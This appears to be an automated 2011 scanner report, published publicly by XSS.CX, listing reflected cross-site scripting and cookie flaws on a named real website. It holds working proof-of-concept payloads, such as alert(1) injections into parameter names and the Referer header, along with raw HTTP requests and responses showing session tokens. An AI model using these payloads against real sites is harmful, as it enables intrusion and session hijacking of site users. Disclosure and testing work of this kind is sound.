XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, abbott-langer.com

Report generated by XSS.CX at Sun Jun 05 06:38:56 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

1.1. http://www.abbott-langer.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.abbott-langer.com/ [name of an arbitrarily supplied request parameter]

1.3. http://www.abbott-langer.com/index.cfm [name of an arbitrarily supplied request parameter]

1.4. http://www.abbott-langer.com/index.cfm [name of an arbitrarily supplied request parameter]

1.5. http://www.abbott-langer.com/ [Referer HTTP header]

1.6. http://www.abbott-langer.com/ [Referer HTTP header]

1.7. http://www.abbott-langer.com/index.cfm [Referer HTTP header]

1.8. http://www.abbott-langer.com/index.cfm [Referer HTTP header]

1.9. http://www.abbott-langer.com/index.cfm [INTTRKID cookie]

1.10. http://www.abbott-langer.com/index.cfm [INTTRKID cookie]

1.11. http://www.abbott-langer.com/index.cfm [TRKID cookie]

1.12. http://www.abbott-langer.com/index.cfm [TRKID cookie]

2. Cookie without HttpOnly flag set

2.1. http://www.abbott-langer.com/

2.2. http://www.abbott-langer.com/index.cfm

3. Referer-dependent response

4. Email addresses disclosed

4.1. http://www.abbott-langer.com/

4.2. http://www.abbott-langer.com/index.cfm

5. Content type incorrectly stated

5.1. http://www.abbott-langer.com/JS/general.js

5.2. http://www.abbott-langer.com/ShopCart/Fuses/JS/general.js



1. Cross-site scripting (reflected)  next
There are 12 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.abbott-langer.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.abbott-langer.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9449b"><a>43d8cb1ea22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?9449b"><a>43d8cb1ea22=1 HTTP/1.1
Host: www.abbott-langer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Jun 2011 20:41:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: CFID=13832066;expires=Sun, 26-May-2041 20:41:55 GMT;path=/
Set-Cookie: CFTOKEN=25b62b253ffde3f0-573DA201-C18B-DF82-389FEF1EFB8AFC3C;expires=Sun, 26-May-2041 20:41:55 GMT;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: USERTRACKER=;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: CFID=13832066;path=/
Set-Cookie: CFTOKEN=25b62b253ffde3f0%2D573DA201%2DC18B%2DDF82%2D389FEF1EFB8AFC3C;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=13832066%2D25b62b253ffde3f0%2D573DA201%2DC18B%2DDF82%2D389FEF1EFB8AFC3C%7C%7C06%2F03%2F2011%2001%3A41%3A55%20PM;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head>
       
               <titl
...[SNIP]...
iteID=16&ReturnImage=Yes&JavaScript=No&UUID=13832066-25b62b253ffde3f0-573DA201-C18B-DF82-389FEF1EFB8AFC3C&CurrentPage=HTTP://www.abbott-langer.com/index.cfm&Circuit=HOME&FuseActionVar=MAIN&QueryString=9449b"><a>43d8cb1ea22=1&ReferringPage=N/A&Language=en&Browser=MSIE&BrowserVersion= 7.0&UserID=13832066-25b62b253ffde3f0-573DA201-C18B-DF82-389FEF1EFB8AFC3C&UniqueVistor=Yes&IPAddress=173.193.214.243&Test=No&Comment=" width
...[SNIP]...

1.2. http://www.abbott-langer.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbott-langer.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da443"-alert(1)-"dacf051550a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?da443"-alert(1)-"dacf051550a=1 HTTP/1.1
Host: www.abbott-langer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Jun 2011 20:42:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: CFID=13832120;expires=Sun, 26-May-2041 20:42:18 GMT;path=/
Set-Cookie: CFTOKEN=70e2d51d045715e2-573DFBE7-C13E-90A0-8D91B5F4CAEFB847;expires=Sun, 26-May-2041 20:42:18 GMT;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: USERTRACKER=;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: CFID=13832120;path=/
Set-Cookie: CFTOKEN=70e2d51d045715e2%2D573DFBE7%2DC13E%2D90A0%2D8D91B5F4CAEFB847;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=13832120%2D70e2d51d045715e2%2D573DFBE7%2DC13E%2D90A0%2D8D91B5F4CAEFB847%7C%7C06%2F03%2F2011%2001%3A42%3A18%20PM;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head>
       
               <titl
...[SNIP]...
<script language="JavaScript" type="text/javascript">SiteTracker("http://www.abbott-langer.com/", "", "", "16","HTTP://www.abbott-langer.com/index.cfm","HOME","MAIN","da443"-alert(1)-"dacf051550a=1","N/A","en","MSIE"," 7.0","13832120-70e2d51d045715e2-573DFBE7-C13E-90A0-8D91B5F4CAEFB847","Yes","173.193.214.243","No","");</script>
...[SNIP]...

1.3. http://www.abbott-langer.com/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.abbott-langer.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaac0"><a>b596bbffb97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /index.cfm?eaac0"><a>b596bbffb97=1 HTTP/1.1
Host: www.abbott-langer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.abbott-langer.com/?da443%22-alert(%22XSS%22)-%22dacf051550a=1
Cookie: LICENSECODE=; MODE=; CFID=5950531; CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8; STOREID=6; TRKID=; INTTRKID=; USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A00%20PM; VID=3; SessionCookieTest=testing123; PersistentCookieTest=testing123; __utma=92019530.1461229368.1307134120.1307134120.1307134120.1; __utmb=92019530.1.10.1307134120; __utmc=92019530; __utmz=92019530.1307134120.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSIONID=

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Jun 2011 21:05:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2002%3A05%3A36%20PM;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head>
       
               <titl
...[SNIP]...
siteID=16&ReturnImage=Yes&JavaScript=No&UUID=5950531-b7cfec4fc71d17a6-57441F3A-0FE1-5155-8B352BCCD83D2DA8&CurrentPage=HTTP://www.abbott-langer.com/index.cfm&Circuit=HOME&FuseActionVar=MAIN&QueryString=eaac0"><a>b596bbffb97=1&ReferringPage=http://www.abbott-langer.com/?da443%22-alert(%22XSS%22)-%22dacf051550a=1&Language=en-us&Browser=&BrowserVersion=&UserID=5950531-b7cfec4fc71d17a6-57441F3A-0FE1-5155-8B352BCCD83D2DA8&Uni
...[SNIP]...

1.4. http://www.abbott-langer.com/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbott-langer.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76c7e"-alert(1)-"20a2564250 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.cfm?76c7e"-alert(1)-"20a2564250=1 HTTP/1.1
Host: www.abbott-langer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.abbott-langer.com/?da443%22-alert(%22XSS%22)-%22dacf051550a=1
Cookie: LICENSECODE=; MODE=; CFID=5950531; CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8; STOREID=6; TRKID=; INTTRKID=; USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A00%20PM; VID=3; SessionCookieTest=testing123; PersistentCookieTest=testing123; __utma=92019530.1461229368.1307134120.1307134120.1307134120.1; __utmb=92019530.1.10.1307134120; __utmc=92019530; __utmz=92019530.1307134120.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSIONID=

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Jun 2011 21:08:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2002%3A08%3A23%20PM;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head>
       
               <titl
...[SNIP]...
<script language="JavaScript" type="text/javascript">SiteTracker("http://www.abbott-langer.com/", "", "", "16","HTTP://www.abbott-langer.com/index.cfm","HOME","MAIN","76c7e"-alert(1)-"20a2564250=1","http://www.abbott-langer.com/?da443%22-alert(%22XSS%22)-%22dacf051550a=1","en-us","","","5950531-b7cfec4fc71d17a6-57441F3A-0FE1-5155-8B352BCCD83D2DA8","No","173.193.214.243","No","");</script>
...[SNIP]...

1.5. http://www.abbott-langer.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.abbott-langer.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfc61"><a>df27a28e5f0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.abbott-langer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=cfc61"><a>df27a28e5f0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Jun 2011 20:42:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: CFID=13832123;expires=Sun, 26-May-2041 20:42:19 GMT;path=/
Set-Cookie: CFTOKEN=2c57db5b6505cf0d-573DFF71-CDDF-99B4-914EC1C17055E0E3;expires=Sun, 26-May-2041 20:42:19 GMT;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: USERTRACKER=;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: CFID=13832123;path=/
Set-Cookie: CFTOKEN=2c57db5b6505cf0d%2D573DFF71%2DCDDF%2D99B4%2D914EC1C17055E0E3;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=13832123%2D2c57db5b6505cf0d%2D573DFF71%2DCDDF%2D99B4%2D914EC1C17055E0E3%7C%7C06%2F03%2F2011%2001%3A42%3A19%20PM;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head>
       
               <titl
...[SNIP]...
